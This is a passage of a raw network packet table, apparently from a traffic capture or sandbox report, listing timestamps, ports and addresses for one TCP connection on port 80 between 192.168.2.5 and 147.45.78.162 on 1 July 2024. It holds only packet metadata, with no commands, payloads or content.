Jul 1, 2024 13:02:07.104604959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.106450081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.106462955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.106520891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.108491898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.108505964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.108515024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.108547926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.108560085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.110439062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.110451937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.110492945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.112384081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.112432003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.117775917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.117851019 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.118148088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.118194103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.118330002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.118375063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.119057894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.119071960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.119110107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.120803118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.120852947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.120991945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.121038914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.121738911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.121751070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.121790886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.123305082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.123353958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.124259949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.124309063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.124644995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.124686956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.124706030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.124758959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.125302076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.125313044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.125350952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.125370026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.126755953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.126820087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.126895905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.126934052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.127473116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.127484083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.127515078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.128535986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.128547907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.128607988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.128628969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.190053940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.190195084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.190227985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.190238953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.190268993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.190316916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.191229105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.191281080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.191612959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.191632986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.191660881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.191680908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.192686081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.192706108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.192734003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.192780972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.193803072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.193815947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.193826914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.193855047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.193897963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.194950104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.194963932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.194999933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.196095943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.196109056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.196119070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.196194887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.197231054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.197242975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.197252989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.197292089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.197319984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.198162079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.198174000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.198183060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.198215961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.198235989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.199047089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.199058056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.199091911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.199110031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.199964046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.199978113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.199989080 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.200017929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.200047016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.201059103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.201071978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.201117039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.201128006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.202079058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.202091932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.202101946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.202137947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.202157021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.203200102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.203213930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.203260899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.203636885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.203649044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.203660965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.203692913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.203711033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.204545975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.204559088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.204571009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.204581022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.204627991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.204669952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.205478907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.205492020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.205509901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.205535889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.205564976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.212443113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.212536097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.212660074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.212671041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.212711096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.212728977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.213295937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.213309050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.213355064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.214088917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.214143991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.217242956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.217303038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.217498064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.217509031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.217664957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.218261957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.218318939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.221319914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.221385956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.221491098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.221503019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.221549034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.221568108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.222181082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.222193003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.222223043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.222244024 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.222935915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.222949028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.222981930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.222992897 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.223788977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.223800898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.223812103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.223834038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.223851919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.224400043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.224467039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.224653959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.224669933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.224704981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.224714041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.225313902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.225326061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.225357056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.225392103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.226067066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.226078987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.226090908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.226114988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.226133108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.522917032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.523071051 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.523211002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.523222923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.523288965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.523793936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.523807049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.523857117 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.524620056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.524635077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.524681091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.525638103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.525651932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.525700092 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.526412010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.526458025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.526469946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.526490927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.526520014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.527323008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.527386904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.527399063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.527441978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.528182030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.528198004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.528239012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.528247118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.528289080 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.529151917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.529166937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.529212952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.530097961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.530112982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.530158043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.531027079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.531048059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.531059027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.531079054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.531109095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.531733990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.531748056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.531795025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.532458067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.532473087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.532531977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.533263922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.533277035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.533322096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.533951998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.533963919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.533973932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.534014940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.534055948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.534668922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.534682035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.534720898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.534739971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.535419941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.535430908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.535440922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.535480022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.535499096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.536284924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.536298037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.536356926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.536915064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.536927938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.536973953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.537647963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.537679911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.537725925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.538459063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.538471937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.538481951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.538525105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.538536072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.539274931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.539285898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.539336920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.539931059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.539942980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.539993048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.540529966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.540540934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.540550947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.540561914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.540580988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.540607929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.540697098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.541232109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.541243076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.541254044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.541265965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.541287899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.541287899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.541309118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.541371107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.542197943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.542211056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.542222977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.542251110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.542277098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.543186903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.543200016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.543211937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.543224096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.543241978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.543301105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.544117928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.544128895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.544140100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.544151068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.544177055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.544195890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.544195890 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.545113087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.545125961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.545137882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.545164108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.545206070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.546009064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.546020985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.546031952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.546044111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.546060085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.546092987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.546837091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.546850920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.546861887 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.546885967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.546905041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.547749043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.547761917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.547774076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.547821999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.547840118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.548580885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.548593998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.548604012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.548624039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.548631907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.548670053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.549423933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.549436092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.549446106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.549473047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.549490929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.550219059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.550230980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.550241947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.550252914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:07.550272942 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:07.550272942 CEST	49705	80	192.168.2.5	147.45.78.162
